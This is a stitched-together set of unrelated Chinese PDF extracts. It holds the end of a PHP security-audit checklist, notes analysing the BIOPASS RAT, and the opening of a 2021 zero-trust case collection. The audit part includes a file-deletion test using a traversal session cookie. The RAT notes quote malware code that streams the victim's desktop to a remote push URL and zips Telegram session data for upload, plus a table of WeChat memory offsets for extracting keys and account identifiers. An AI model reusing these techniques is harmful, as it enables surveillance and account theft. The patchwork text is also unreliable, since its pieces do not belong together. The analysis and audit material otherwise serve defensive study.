也会危害到帐户安全
5. secure 设置
如果使用 HTTPS,那么应该设置 session.cookie_secure=ON,确保使用 HTTPS 来传输
cookies
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
6. session 固定
如果当权限级别改变时(例如核实用户名和密码后,普通用户提升到管理员),我们就应
该修改即将重新生成的会话 ID,否则程序会面临会话固定攻击的风险。
7. CSRF
跨站请求伪造攻击,是攻击者伪造一个恶意请求链接,通过各种方式让正常用户访问后,
会以用户的身份执行这些恶意的请求。我们应该对比较重要的程序模块,比如修改用户密码,添
加用户的功能进行审查,检查有无使用一次性令牌防御 csrf 攻击。
4.
加密
1. 明文存储密码
采用明文的形式存储密码会严重威胁到用户、应用程序、系统安全。
2. 密码弱加密
使用容易破解的加密算法,MD5 加密已经部分可以利用 md5 破解网站来破解
3. 密码存储在攻击者能访问到的文件
例如:保存密码在 txt、ini、conf、inc、xml 等文件中,或者直接写在 HTML 注释中
5.
认证和授权
1. 用户认证
检查代码进行用户认证的位置,是否能够绕过认证,例如:登录代码可能存在表单注入。
检查登录代码有无使用验证码等,防止暴力破解的手段
1. 函数或文件的未认证调用
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
一些管理页面是禁止普通用户访问的,有时开发者会忘记对这些文件进行权限验证,导致漏洞发
生
某些页面使用参数调用功能,没有经过权限验证,比如 index.php?action=upload
3. 密码硬编码
有的程序会把数据库链接账号和密码,直接写到数据库链接函数中。
6.
随机函数
1. rand()
rand()最大随机数是 32767,当使用 rand 处理 session 时,攻击者很容易破解出 session,
建议使用 mt_rand()
2. mt_srand()和mt_rand()
e="text-indent: 0.85cm; margin-bottom: 0cm; line-height: 125%">PHP4 和 PHP5<5.2.6,这两个函
数处理数据是不安全的。在 web 应用中很多使用 mt_rand 来处理随机的 session,比如密码找回
功能等,这样的后果就是被攻击者恶意利用直接修改密码。
7.
特殊字符和多字节编码
1. 多字节编码
8.
PHP 危险函数
1. 缓冲区溢出
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
confirm_phpdoc_compiled
影响版本:
phpDocumentor phpDocumentor 1.3.1
phpDocumentor phpDocumentor 1.3 RC4
phpDocumentor phpDocumentor 1.3 RC3
phpDocumentor phpDocumentor 1.2.3
phpDocumentor phpDocumentor 1.2.2
phpDocumentor phpDocumentor 1.2.1
phpDocumentor phpDocumentor 1.2
mssql_pconnect/mssql_connect
影响版本:PHP <= 4.4.6
crack_opendict
影响版本:PHP = 4.4.6
snmpget
影响版本:PHP <= 5.2.3
ibase_connect
影响版本:PHP = 4.4.6
unserialize
影响版本:PHP 5.0.2、PHP 5.0.1、PHP 5.0.0、PHP 4.3.9、PHP 4.3.8 e="font-size: 10pt">、
PHP 4.3.7、PHP 4.3.6、PHP 4.3.3、PHP 4.3.2、PHP 4.3.1、PHP 4.3.0、PHP 4.2.3、PHP
4.2.2、PHP 4.2.1、PHP 4.2.0、PHP 4.2-dev、PHP 4.1.2、PHP 4.1.1、PHP 4.1.0、PHP 4.1、
PHP 4.0.7、PHP 4.0.6、PHP 4.0.5、PHP 4.0.4、PHP 4.0.3pl1、PHP 4.0.3、PHP 4.0.2、
PHP 4.0.1pl2、PHP 4.0.1pl1、PHP 4.0.1
2. session_destroy()删除文件漏洞
影响版本:不祥,需要具体测试
测试代码如下:
<?php
session_save_path(‘./’);
session_start();
if($_GET[‘del’]) {
session_unset();
session_destroy();
}else{
$_SESSION[‘do’]=1;
echo(session_id());
print_r($_SESSION);
}
?>
当我们提交 cookie:PHPSESSIONID=/../1.php,相当于删除了此文件
3. unset()-zend_hash_del_key_or_index 漏洞
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
zend_hash_del_key_or_index PHP4 小于 4.4.3 和 PHP5 小于 5.1.3,可能会导致
zend_hash_del 删除了错误的元素。当 PHP 的 unset()函数被调用时,它会阻止变量被 unset。
9.
信息泄露
1. phpinfo
如果攻击者可以浏览到程序中调用 phpinfo 显示的环境信息,会为进一步攻击提供便利
10. PHP 环境
1. open_basedir 设置
open_basedir 能限制应用程序能访问的目录,检查有没有对 open_basedir 进行设置,当
然有的通过 web 服务器来设置,例如:apache 的 php_admin_value,nginx+fcgi 通过 conf 来控
制 php 设置
2. allow_url_fopen 设置
如果 allow_url_fopen=ON,那么 php 可以读取远程文件进行操作,这个容易被攻击者利用
3. > allow_url_include 设置
如果 allow_url_include=ON,那么 php 可以包含远程文件,会导致严重漏洞
4. safe_mode_exec_dir 设置
这个选项能控制 php 可调用的外部命令的目录,如果 PHP 程序中有调用外部命令,那么指
定外部命令的目录,能控制程序的风险
5. magic_quote_gpc 设置
这个选项能转义提交给参数中的特殊字符,建议设置 magic_quote_gpc=ON
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
6. register_globals 设置
开启这个选项,将导致 php 对所有外部提交的变量注册为全局变量,后果相当严重
7. safe_mode 设置
safe_mode 是 PHP 的重要安全特性,建议开启
8. session_use_trans_sid 设置
如果启用 session.use_trans_sid,会导致 PHP 通过 URL 传递会话 ID,这样一来,
攻击者就更容易劫持当前会话,或者欺骗用户使用已被攻击者控制的现有会话。
9. display_errors 设置
如果启用此选项,PHP 将输出所有的错误或警告信息,攻击者能利用这些信息获取 web 根
路径等敏感信息
10.
expose_php 设置
如果启用 expose_php 选项,那么由 PHP 解释器生成的每个响应都会包含主机系统上
所安装的 PHP 版本。了解到远程服务器上运行的
PHP 版本后,攻击者就能针对系统枚举已
知的盗取手段,从而大大增加成功发动攻击的机会。
参考文档
https://www.fortify.com/vulncat/zh_CN/vulncat/index.html
http://secinn.appspot.com/pstzine/read?issue=3&articleid=6
http://riusksk.blogbus.com/logs/51538334.html
http://www.owasp.org/index.php/Category:OWASP_Code_Review_Project | pdf |
后渗透收集
参考链接
https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-
streaming.html
表格
整理了BIOPASS RAT所做的动作
此模块部分不可用,请升级帐户后使用
AutoRun
为持久性创建计划任务
调用pythoncom进行
OpenEverything
Downloads and
runs Everything from
voidtools
会下载官方
everything,启动后使
用ShowWindow隐藏
窗口,everything启动
后会启动一个http用于
查询。
但是可能需要bypass
uac。
关闭则执行 TASKKILL
/F /IM Everything.exe
OpenFFmpegLive
Downloads and runs
FFmpeg (for screen
video capture)
下载ffmpeg之后,执行
win32api .ShellExecute
(0 ,'open',filename ,' -f
gdigrab -i desktop -
draw_mouse 0 -
pix_fmt yuv420p -
vcodec libx264 -r 5 -
b:v 1024k -bufsize
1024k -f flv "
{}"'.format
(config.parameters
['push_url']),os.getenv
('public'),0 )#line:934
push_url 为阿里云的地
址
https://help.aliyun.co
m/document_detail/4
4304.html
command
A
behavior
B
comment
C
1
2
就可以时时监控屏幕了
Open_Obs_Live
Downloads OBS
Studio and starts live
streaming
下载开源的obs studio
监控
SnsInfo
Lists QQ, WeChat, and
Aliwangwang
directories
path .join (path
.expanduser
('~'),'Documents','Tenc
ent Files')
path .join (path
.expanduser
('~'),'Documents','WPS
Cloud Files')
微信可以用注册表查
(winreg
.HKEY_CURRENT_USER
,r"SOFTWARE\Tencent
\WeChat")
FileSavePathz字段
路径再加上 WeChat
Files
阿里旺旺
[r'Program Files
(x86)\AliWangWang\p
rofiles',r'\Program
Files\AliWangWang\pr
ofiles']
InstallTcpdump
Downloads and
installs
the tcpdump tool
PackingTelegram
Compresses and
uploads Telegram's
“tdata” directory to
cloud storage
O0OOOOO000000O0
OO =subprocess
.Popen ("cmd.exe /c
wmic process where
name='telegram.exe'
get
ExecutablePath",shell
=True ,stdout
=subprocess .PIPE
)#line:1520
OOOOOOOOOOOOO
00OO
=O0OOOOO000000O
3
4
0OO .stdout .readlines
()#line:1521
O0OOO000000O00O0
0 =os .path .join (os
.getenv
('temp'),'telegram_{}.zi
p'.format (time .time
()))#line:1522
OOO0OO0OOOO000
O0O ={"src_paths":
[],"dst_zipfile":O0OOO
000000O00O00
,"includes":"","exclude
s":"emoji|user_data","
maxsize":10 *1024
*1024 ,}#line:1529
OpenProxy
Downloads and
installs the frp
proxy client in the
“%PUBLIC%” folder
frpc.exe
OpenVnc
Downloads and
installs jsmpeg-
vnc tool in the
“%PUBLIC%/vnc/”
folder
vdwm.exe
GetBrowsers
ScreenShot
5
6
config = {
'pid': 0,
'support_list': [
{
'version': '3.3.0.93',
'PhoneOffset': 0x1DDF568,
'KeyOffset':0x1DDF914,
'UsernameOffset': 0x1DDF938,
'WxidOffset': 0x1DDF950,
},
{
'version': '3.3.0.76',
'PhoneOffset': 0x1DDB388,
'KeyOffset':0x1DDB734,
'UsernameOffset': 0x1DDB388,
'WxidOffset': 0x1DDB388,
},
{
'version': '3.2.1.156',
'PhoneOffset': 0x1AD1BE0,
'KeyOffset':0x1AD1F8C,
'UsernameOffset': 0x1AD1FB0,
'WxidOffset': 0x1AD1FC8,
},
{
'version': '3.2.1.154',
'PhoneOffset': 0x1AD1BE0,
'KeyOffset':0x1AD1F8C ,
'UsernameOffset': 0x1AD1FB0,
'WxidOffset': 0x1AD1B34,
},
{
'version': '3.2.1.151',
'PhoneOffset': 0x1ACF980,
'KeyOffset': 0x1ACFD2C,
'UsernameOffset': 0x1ACFD50,
'WxidOffset': 0x1AD2068,
},
{
'version': '3.2.1.143',
'PhoneOffset': 0x1ACF960,
'KeyOffset': 0x1ACFD0C,
'UsernameOffset': 0x1ACFD30,
'WxidOffset': 0x1ACFD48,
},
{
'version': '3.2.1.132',
'PhoneOffset': 0x1ACF980,
'KeyOffset': 0x1ACFD2C,
'UsernameOffset': 0x1ACFAB0,
'WxidOffset': 0x1ACFD68,
},
{
'version': '3.2.1.112',
'PhoneOffset': 0x1AA5C60,
'KeyOffset': 0x1AA600C,
'UsernameOffset': 0x1AA5D90,
'WxidOffset': 0x1AA5BB4,
},
{
'version': '3.2.1.121',
'PhoneOffset': 0x1AA5C60,
'KeyOffset': 0x1AA600C,
'UsernameOffset': 0x1AA5D90,
'WxidOffset': 0x1AA5BB4,
},
{
'version': '3.2.1.82',
'PhoneOffset': 0x1AA1BD8,
'KeyOffset': 0x1AA1F84,
'UsernameOffset': 0x1AA1D08,
'WxidOffset': 0x1AA42A0,
},
{
'version': '3.1.0.72',
'PhoneOffset': 0x1A3630,
'KeyOffset': 0x1A39DC,
'UsernameOffset': 0x1A3A00,
'WxidOffset': 0x1A3A18,
},
{
'version': '3.1.0.67',
'PhoneOffset': 0x1A3630,
'KeyOffset': 0x1A39DC,
'UsernameOffset': 0x1A3A00,
'WxidOffset': 0x1A3A18,
},
{
'version': '3.1.0.66',
'PhoneOffset': 0x1A3630,
'KeyOffset': 0x1A39DC,
'UsernameOffset': 0x1A3A00,
'WxidOffset': 0x1A3A18,
},
{
'version': '3.1.0.41',
'PhoneOffset': 0x1A25D0,
'KeyOffset': 0x1A297C,
'UsernameOffset': 0x1A2700,
'WxidOffset': 0x1A522C,
},
{
'version': '3.0.0.57',
'PhoneOffset': 0x156AC0,
'KeyOffset': 0x156E6C,
'UsernameOffset': 0x156BF0,
'WxidOffset': 0x174C28,
},
{
'version': '3.0.0.57',
'PhoneOffset': 0x156AC0,
'KeyOffset': 0x156E6C,
'UsernameOffset': 0x156BF0,
'WxidOffset': 0x174C28,
},
{
'version': '2.6.8.52',
'PhoneOffset': 0x126D950,
'WxidOffset': 0x126D8A4,
'UsernameOffset': 0x126DA80,
'KeyOffset': 0x126DCE0
},
{
'version': '2.7.1.88',
'PhoneOffset': 0x1397310,
'WxidOffset': 0x13976E0,
'UsernameOffset': 0x1397440,
'KeyOffset': 0x13976A0
},
{
'version': '2.8.0.112',
'PhoneOffset': 0x1618820,
'WxidOffset': 0x1618774,
'UsernameOffset': 0x1618950,
'KeyOffset': 0x1618BB0
},
{
'version': '2.8.0.116',
'PhoneOffset': 0x1618860,
'WxidOffset': 0x1625620,
'UsernameOffset': 0x1618990,
'KeyOffset': 0x1618BF0
},
{
'version': '2.8.0.121',
'PhoneOffset': 0x161C8C0,
'WxidOffset': 0x161C814,
'UsernameOffset': 0x161C9F0,
'KeyOffset': 0x161CC50
},
{
'version': '2.9.0.112',
'PhoneOffset': 0x16B48E0,
'WxidOffset': 0x16CE32C,
'UsernameOffset': 0x16B4A10,
'KeyOffset': 0x16B4C70
},
{
'version': '2.9.0.123',
'PhoneOffset': 0x16B49C0,
'WxidOffset': 0x16B4914,
'UsernameOffset': 0x16B4AF0,
'KeyOffset': 0x16B4D50
},
{
'version': '2.9.5.56',
'PhoneOffset': 0x1774100,
'WxidOffset': 0x17744E8,
'UsernameOffset': 0x1774230,
'KeyOffset': 0x17744A8
},
{
'version': '3.0.0.9',
'PhoneOffset': 0x150960,
'WxidOffset': 0x150D48,
'UsernameOffset': 0x150A90,
'KeyOffset': 0x150D0C
},
{
'version': '2.6.7.57',
'PhoneOffset': 0x125D140,
'WxidOffset': 0x1264AC4,
'UsernameOffset': 0x125D270,
'KeyOffset': 0x125D4B8
},
{
'version': '2.6.8.51',
'PhoneOffset': 0x126D950,
'WxidOffset': 0x127F3C8,
'UsernameOffset': 0x126DA80,
'KeyOffset': 0x126DCE0
},
{
'version': '2.6.8.65',
'PhoneOffset': 0x126D930,
'WxidOffset': 0x127F3C0,
'UsernameOffset': 0x126DA60,
'KeyOffset': 0x126DCC0
},
{
'version': '2.7.1.82',
'PhoneOffset': 0x1397330,
'WxidOffset': 0x1397284,
'UsernameOffset': 0x1397460,
'KeyOffset': 0x13976C0
},
{
'version': '2.7.1.85',
'PhoneOffset': 0x1397330,
'WxidOffset': 0x1397700,
'UsernameOffset': 0x1397460,
'KeyOffset': 0x13976C0
},
{
'version': '2.8.0.106',
'PhoneOffset': 0x1616860,
'WxidOffset': 0x16167B4,
'UsernameOffset': 0x1616990,
'KeyOffset': 0x1616BF0
},
{
'version': '2.8.0.121',
'PhoneOffset': 0x161C8C0,
'WxidOffset': 0x162975C,
'UsernameOffset': 0x161C9F0,
'KeyOffset': 0x161CC50
},
{
'version': '2.8.0.133',
'PhoneOffset': 0x1620980,
'WxidOffset': 0x1639DBC,
'UsernameOffset': 0x1620AB0,
'KeyOffset': 0x1620D10
},
{
'version': '2.6.8.68',
'PhoneOffset': 0x126E930,
'WxidOffset': 0x126E884,
'UsernameOffset': 0x126EA60,
'KeyOffset': 0x126ECC0
},
{
'version': '2.9.0.95',
'PhoneOffset': 0x16B4860,
'WxidOffset': 0x16B47B4,
'UsernameOffset': 0x16B4990,
'KeyOffset': 0x16B4BF0
},
{
'version': '2.6.7.32',
'PhoneOffset': 0x125C100,
'WxidOffset': 0x1263A84,
'UsernameOffset': 0x125C230,
'KeyOffset': 0x125C478
},
{
'version': '2.6.6.25',
'PhoneOffset': 0x1131C98,
'WxidOffset': 0x1131B78,
'UsernameOffset': 0x1131B90,
'KeyOffset': 0x1131B64
},
]
}
打包了微信各个版本定位的内存基地址和实现方法。
使用 WinDivert 操纵流量的主要脚本
原始的big.txt
wechat.txt
big.py
104 KB
wechat.py
18 KB | pdf |
©2021 云安全联盟大中华区-版权所有
1
©2021 云安全联盟大中华区-版权所有
2
目 录
一、前
言..........................................................................................................................................5
二、落地案例清单............................................................................................................................. 7
三、落地案例......................................................................................................................................9
1、安恒信息温州市大数据发展管理局零信任实践案例................................................................9
2、任子行零信任安全防护解决方案护航海事局移动/远程办公安全........................................13
3、奇安信零信任安全解决方案在部委大数据中心的实践案例..................................................17
4、吉大正元某大型集团公司零信任实践案例..............................................................................19
5、格尔软件航空工业商网零信任安全最佳实践..........................................................................27
6、厦门服云招商局零信任落地案例..............................................................................................36
7、深信服山东港口集团零信任多数据中心安全接入..................................................................40
8、杭州漠坦尼物联网零信任安全解决方案..................................................................................41
9、易安联中国核工业华兴建设有限公司 EnSDP 零信任安界防护平台......................................44
10、虎符网络国家电网某二级单位基于零信任架构的远程安全访问解决方案........................48
11、奇安信某大型商业银行零信任远程访问解决方案................................................................54
12、蔷薇灵动中国交通建设股份有限公司零信任落地解决方案................................................59
13、缔盟云中国建设银行零信任落地案例....................................................................................67
14、联软科技光大银行零信任远程办公实践................................................................................70
15、云深互联阳光保险集团养老与不动产中心零信任落地案例................................................74
16、上海云盾贵州白山云科技股份有限公司应用可信访问........................................................78
17、天谷信息 e 签宝零信任实践案例............................................................................................84
18、北京芯盾时代电信运营商零信任业务安全解决方案落地项目............................................88
19、云深互联零信任/SDP 安全在电信运营商行业的实践案例...................................................93
20、启明星辰中国移动某公司远程办公安全接入方案................................................................98
21、指掌易某集团灵犀·SDP 零信任解决方案...........................................................................104
22、美云智数美的集团零信任实践案例......................................................................................111
23、360 零信任架构的业务访问安全案例...................................................................................117
24、数字认证零信任安全架构在陆军军医大学第一附属医院的应用......................................119
25、山石网科南京市中医院云数据中心“零信任”建设项目成功案例..................................124
©2021 云安全联盟大中华区-版权所有
3
26、九州云腾科技有限公司某知名在线教育企业远程办公零信任解决方案..........................132
四、关于云安全联盟大中华区..................................................................................................... 136
©2021 云安全联盟大中华区-版权所有
4
@2021 云安全联盟大中华区-保留所有权利。你可以在你的电脑上下载、储存、展
示、查看、打印及,或者访问云安全联盟大中华区官网(https://www.c-csa.cn)。须
遵守以下: (a)本文只可作个人、信息获取、非商业用途;(b) 本文内容不得篡改; (c)
本文不得转发; (d)该商标、版权或其他声明不得删除。在遵循中华人民共和国著作权
法相关条款情况下合理使用本文内容,使用时请注明引用于云安全联盟大中华区。
©2021 云安全联盟大中华区-版权所有
5
一、前
言
零信任这一概念提出到现在已有十一年了。作为新一代的网络安全防护理念,零信
任(Zero Trust)坚持 “持续验证,永不信任”,基于身份认证和授权重新构建了访问
控制的基础。
当前,零信任已经从一种安全理念逐步发展成为网络安全关键技术,受到了各国政
府的认可。
由于传统网络安全模型逐渐失效,零信任安全日益成为新时代下的网络安全的新理
念、新架构,甚至已经上升为国家的网络安全战略。2019 年,在工信部发布的《关于
促进网络安全产业发展的指导意见(征求意见稿)》的意见中, “零信任安全”被列入
“着力突破网络安全关键技术”之一。同年,中国信通院发布了《中国网络安全产业白
皮书》,报告中指出:“零信任已经从概念走向落地”。国家也首次将零信任安全技术和
5G、云安全等并列列为我国网络安全重点细分领域技术。
我们欣喜地看到,从 2020 年云安全联盟大中华区召开了“十年磨一剑,零信任出
鞘”为主题的零信任十周年暨首届零信任峰会,越来越多的 IT 安全厂商投入到了零信
任产品的开发和实施中来。从 2021 年 5 月底云安全联盟大中华区征集零信任案例以来,
在短短十多天的时间内,我们就收到了 29 家厂商的落地案例,这个速度大大出乎我们
的意料,而收集到的案例数量也比去年丰富了不少,可见零信任实践的火爆程度。与
2020 年的 9 个方案相比,今年的方案有了 300%的增长。最后基于“讲技术不讲概念,
强调落地不空谈方案”的原则,最终筛选了 24 个案例,涉及 9 个行业,涵盖了政企、
能源、金融、互联网、医疗等多个行业,充分说明了零信任技术的广泛适用性。在征集
案例的过程中,有的客户尽管提供了授权,但不希望自己的公司名出现在案例中。因此,
对于这部分客户,我们在案例中进行了匿名处理。
NIST 在《零信任架构标准》白皮书中列举了 3 个技术方案:1)SDP,软件定义边
界;2)IAM,身份权限管理;3)MSG,微隔离。从我们收到的案例来看,绝大部分案例都是
SDP 的案例,聚焦于远程办公的场景。这可能与新冠疫情带来的办公模式的变化有关,
与云安全联盟最早推广 SDP 有关,也与 SDP 的技术复杂度较低有关。MSG 和身份权限管
理案例的匮乏一方面说明调整传统网络架构以适应零信任架构充满挑战,仍然有很多工
©2021 云安全联盟大中华区-版权所有
6
作要做,另一方面,很多企业虽然接受零信任的理念,但对于系统转换可能的风险持审
慎态度,更愿意从边缘系统开始试水。
因此,云安全联盟大中华区汇编这本《2021 零信任落地案例集》,收集各厂商的成
功案例及实施过程中的经验教训,一方面是希望给众多厂商和客户以参考,让大家知道
零信任离我们并不遥远;另一方面是鼓励更多的企业投入零信任的探索中来,进入零信
任的深水区,打造更先进的零信任平台。
随着企业数字化转型的深入,传统边界逐渐消失,企业以传统安全防护理念应对安
全风险暴露出越来越多问题,而零信任理念为我们提供了新的安全思路。我们希望今后
会看到越来越多更具代表性的零信任应用场景和探索涌现出来。
《2021 零信任落地案例集》包含了去年和今年入围的案例。云安全联盟大中华区
在今后仍密切关注零信任应用实践并更新这一案例集,我们计划每年都发布一份《零信
任落地案例集》,收录从 2020 年以来不同行业的零信任实践典型案例,供广大从业用户
了解这一领域的最新实践,并协助推动零信任技术的发展。
感谢案例提供的全体单位,经过多次修改及调整,力争为行业呈现单位最优的解决
方案。
感谢 CSA 大中华区零信任工作组组长陈本峰、专家姚凯以及研究助理夏营对本次
《2021 零信任落地案例集》汇编的大力支持。
如文有不妥当之处,敬请读者联系 CSA GCR 秘书处给与雅正! 联系邮箱:
[email protected]; 云安全联盟 CSA 公众号
©2021 云安全联盟大中华区-版权所有
7
二、案例名单
序号
案例所
属行业
零信任技术
案例用户名称
案例提供单位
1
政企
SDP
温州市大数据发展管理
局
安恒信息
2
政企
SDP
某市海事局
任子行
3
政企
SDP
部委大数据中心(2020 年
案例)
奇安信
4
政企
IAM
某大型集团公司
吉大正元
5
政企
SDP
中国航空工业集团有限
公司
格尔软件
6
政企
微隔离
招商局集团
厦门服云
7
交通
SDP
山东港口集团
深信服
8
能源
SDP
某省电力公司直属单位
漠坦尼
9
能源
SDP
中国核工业华兴建设有
限公司
易安联
10
能源
SDP
国家电网有限公司某二
级直属单位
虎符网络
11
金融
SDP
某大型商业银行
奇安信
12
金融
微隔离
中国交通建设股份有限
公司
蔷薇灵动
13
金融
SDP
中国建设银行
缔盟云
14
金融
SDP
光大银行
联软
15
金融
SDP
阳光保险集团养老与不
动产中心
云深互联
16
互联网
SDP
贵州白山云科技股份有
限公司
上海云盾
17
互联网
IAM
e 签宝
天谷信息
18
运营商
SDP,IAM
电信运营商
芯盾时代
19
运营商
SDP
电信运营商(2020 年案
云深互联
©2021 云安全联盟大中华区-版权所有
8
例)
20
运营商
IAM
中国移动某公司
启明星辰
21
制造业
SDP
某集团
指掌易
22
制造业
SDP
美的集团
美云智数
23
制造业
SDP
某国家高新技术企业
360
24
医疗
SDP
陆军军医大学第一附属
医院
数字认证
25
医疗
微隔离
南京市中医院
山石网科
26
教育
IAM
某知名在线教育企业
九州云腾
©2021 云安全联盟大中华区-版权所有
9
三、具体案例
1、安恒信息温州市大数据发展管理局零信任实
践案例
1.1 方案背景
温州市大数据发展管理局一直来在以大数据赋能智慧城市、智慧国企、智慧健康等
方面走在前列,已建成的一体化智能化公共数据平台为该市下属的委办单位、企业、公
众提供良好的大数据业务支撑服务,以数据智能赋能数字经济和民生。
十四五规划中,数据相关产业将成为未来中国发展建设的重点部署领域,相关的数
据安全也变得更加重要。随着数据开放面逐渐扩大、数据访问量不断增加,温州市大数
据发展管理局预见到了开放共享过程中潜在的数据安全防护及溯源问题,例如数据访问
无法追溯到最终用户、API 自身脆弱性带来的安全配置错误及注入风险、API 异常高频
访问带来的数据暴露风险等,为此温州市大数据局启动了一体化智能化公共数据平台零
信任安全防护体系的建设任务,并引入安恒信息作为零信任安全供应商。
1.2 方案概述和应用场景
基于零信任的理念,本次方案强调“永不信任、始终确认”,在业务访问的全流程
中引入身份认证的能力,对管控的客体对象“用户”、“应用”的身份进行持续校验,并
针对防护对象 API 资源,实现“先认证、再授权、再访问”的管控逻辑,通过为公共数
据平台构建虚拟身份安全边界,最大程度上收窄公共数据平台的暴露面,保障业务安全
开展。
©2021 云安全联盟大中华区-版权所有
10
图 1 温州市一体化智能化公共数据平台零信任安全防护体系逻辑架构
温州市一体化智能化公共数据平台零信任安全防护体系由以下几个关键组件构成:
1.统一控制台:作为零信任架构中的 PDP,维护用户清单、应用清单及资源清
单,集成 SSO 系统,并负责零信任体系内访问控制策略的制定和 API 安全代理的控
制。其中用户清单来源于浙江省数字政府 IDaaS、浙政钉等多源用户身份目录的合
并,追踪和更新温州全市 12 万余用户信息的变化,所有用户具有唯一标识,用户
清单为零信任体系中的 UEBA 行为分析引擎提供信息;应用清单维护所有接入零信
任体系的应用系统的身份信息,通过与温州市建设的目录系统联动,实现全网应用
身份统一,并为应用生成零信任安全接入工具;资源清单维护所有要保护的客体对
象信息(在温州场景下即 API 接口资源),通过手动配置或从流量中分析的方式建
立。
2.API 安全代理:作为零信任架构中的 PEP,以“默认拒绝”的模式接管所有
面向公共数据平台的访问请求,针对每条请求进行身份鉴别和权限鉴别,仅放通通
过统一控制台验证的合法请求,同时输出其他 API 安全防护能力。
3.UEBA 行为分析引擎:负责采集零信任体系中的用户行为数据,并对用户行为、
应用行为进行大数据建模匹配分析,为统一控制台的访问控制策略指定提供输入依
据。应商。
1.3 优势特点和应用价值
1.3.1 统一身份、安全认证
统一控制台通过 SSO 系统为政务外网所有的应用系统提供认证门户,接入应用的用
©2021 云安全联盟大中华区-版权所有
11
户在通过统一认证的合法性校验后将会生成包含用户、应用身份唯一信息的访问令牌,
作为获得后续访问资源的授权凭证之一。
统一控制台在认证过程中,通过对接浙政钉体系、短信体系等,提供多因子认证手
段,并通过门户获取登录环境信息,综合判定用户身份,并在发生异常访问事件时对用
户登录进行快速处置。
1.3.2 收缩资源暴露面
API 安全代理逻辑串行在公共数据平台的访问通道上,默认拒绝所有请求。统一控
制台为注册应用生成访问工具,实现只有集成了访问工具的应用系统服务器可以建立安
全连接,同时在应用层叠加用户身份凭证的验证,实现只有授信用户、通过授信应用服
务器才能够访问 API 资源,极大强化了公共数据平台对抗潜在的扫描攻击等威胁的能力。
1.3.3 全流量加密
API 安全代理为所有访问公共数据平台的请求加载 TLS 加密通道,保障流量在通道
上的安全加密、防篡改。
1.3.4 用户及 API 调用行为分析
API 安全管控系统支持对 API 访问过程中产生的访问日志进行智能分析,并发现潜
在的违规调用行为。统一控制台支持按场景扩展异常行为特征匹配规则,根据用户、应
用、IP、入参、出参等完整的 API 请求日志信息,帮助安全团队发现凭证共享、疑似拖
库、暴力破解等行为。
1.3.5 API 敏感信息监控及溯源
为调用方发起的所有访问请求形成日志记录,记录包括但不限于调用方(用户、应
用)身份、IP、访问接口、时间、返回字段等信息,并向统一管控平台上报。
API 安全管控系统将按配置对 API 返回数据中的字段名、字段值进行自动分析,发
现字段中包含的潜在敏感信息并标记,帮助安全团队掌握潜在敏感接口分布情况。
©2021 云安全联盟大中华区-版权所有
12
1.4 经验总结
项目的实施准备阶段,交付团队首先在统一控制台上拉通多方身份及认证体系、注
册一体化智能化公共数据平台服务,准备好零信任安全防护体系的上线和基础。在该阶
段,需要注意对多方身份目录的梳理,涉及到多方用户信息整合的,需要提前获取各方
所提供的数据同步文档、接口文档,确认同步方案,以确保用户信息能够及时同步、保
持一致。
搭建好基础架构后,统一控制台即对应用系统开放单点登录及访问工具集成能力,
优先选择了开发中的和新上线的业务系统进行单点登录对接,并将 SSO 能力形成标准文
档,作为后续政务外网应用开发、接入一体化智能化公共数据平台服务前的必选项之一。
需要尤其注意的是在现有的访问体系下,如何向新的安全访问控制体系迁移。因此
项目组在一体化智能化公共数据平台侧,对接口的访问迁移也采用分步骤的方式。在项
目实施前期阶段,公共数据平台上已有接口并没有做强制的访问策略切换,只针对新上
线的接口,在公共数据平台上启用源 IP 白名单,只接收 API 安全代理转发来的请求;
同时,由 API 安全代理兼容公共数据平台的认证能力,不再向新上线的应用提供公共数
据平台自身的认证凭证,使其必须通过 API 安全管控系统访问,完成遗留的通道切换后,
再处理网络策略的连通性。
另外,在运维流程上实现资源目录的统一管理运维,对后期维护来说也非常重要,
一次项目组通过将温州市用户统一登录中心(统一控制台)对接温州市资源目录系统,
打通新应用接入的标准化流程,实现业务资源的统一运维。
在访问过程中,统一控制台收集 API 安全代理上报的日志,对 API 的访问频度、调
用方分布、异常行为、API 敏感数据进行分析和展示,根据分析结果、API 重要程度逐
渐进行白名单策略的切换。
©2021 云安全联盟大中华区-版权所有
13
2、任子行零信任安全防护解决方案护航海事局
移动/远程办公安全
2.1 方案背景
2.1.1 用户需求及方案必要性
随着网络技术在海事业务如船舶驾驶控制、货物装卸、推进系统、旅客管理、通信
系统等方面的应用不断提升,越来越多的对外信息交互,使海事业务遭受网络威胁的隐
患也不断加剧,这些潜在的威胁可能导致有关的操作、安全或安保系统的破坏或信息的
泄露。
网络安全是某海事局开展海事安全管理体系建设中的重要组成部分,自公安部
2018 年组织国家级的网络攻防实战演练以来,某海事局作为实战检验的重点单位,其
信息交互、网络环境、信息设备系统等复杂性对网络安全综合防御能力提出重要挑战。
同时,网络安全将是 2021 年符合证明(DOC)年度审核的一个重点领域,迫切需要
建立由内到外的安全架构体系,保障海事业务信息系统安全稳定运行,满足移动办公、
审批、执法等应用场景需求。
2.2 方案概述和应用场景
2.2.1 用户需求与解决方案
用户存在的安全需求总结如下:
1.系统直接暴露在互联网上,导致攻击目标明确,采用 VPN 存在漏洞和连接终端使
用不顺畅问题;
2.存在来自于互联网的肉鸡恶意扫描、恶意攻击;
3.用户在互联网上注册时使用简单好记密码或多个业务使用统一密码,导致访问主
体的身份安全无法保障;
©2021 云安全联盟大中华区-版权所有
14
4.系统和应用程序的漏洞属于致命威胁。
任子行结合海事局的实际需求与面临的挑战,助力海事局建立综合防御能力更强的
网络安全体系,具体实施方案如下:
1.建立统一工作台,多业务系统统一门户,在解决业务访问主体身份安全问题的同
时实现单点登录;
2.采用细腻动态的访问控制策略,弱化内网安全事件发生的风险,仅允许合法的请
求和合法的客户端访问业务系统,拒绝非法请求,屏蔽非法流量的攻击;
3.业务系统隐身,同时隐藏程序漏洞,将企业内网应用暴露的攻击面降到最低;
4.持续的安全信任评估,及时发现用户的异常登录和异常访问行为。
2.2.2 用户使用部门及规模
安全监督科、工会、组织人事科、办公室等 12 个科室。(基于信息安全需求,此处
不一一列举)
©2021 云安全联盟大中华区-版权所有
15
图 1 方案架构示意图
2.3 优势特点和应用价值
